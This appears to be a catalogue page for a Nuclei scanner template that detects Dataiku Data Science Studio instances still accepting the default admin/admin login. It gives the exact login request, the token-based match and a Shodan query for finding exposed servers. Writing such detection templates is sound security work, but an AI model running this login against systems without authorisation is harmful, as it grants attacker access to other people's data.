Skip to content

Dataiku - Default Login

ID: dataiku-default-login

Severity: high

Author: random-robbie

Tags: default-login,dataiku

Dataiku contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. This vulnerability may also lead to server-side request forgery and/or remote code execution.

id: dataiku-default-login
info:
name: Dataiku - Default Login
author: random-robbie
severity: high
description: Dataiku contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. This vulnerability may also lead to server-side request forgery and/or remote code execution.
reference:
- https://www.dataiku.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:dataiku:data_science_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"dataiku"
product: data_science_studio
vendor: dataiku
tags: default-login,dataiku
http:
- raw:
- |
POST /dip/api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=utf-8
login=admin&password=admin
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'dss_access_token'
- type: status
status:
- 200
# digest: 4a0a0047304502202bc23b9e4957f0e4a3c0121092407af883c754f9cbfb45f22788d7f5aaf608f602210098e5928be4687f8d1f49362e765685d724d00467883ca30e4e9dee7f1003d058:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/dataiku/dataiku-default-login.yaml"

View on Github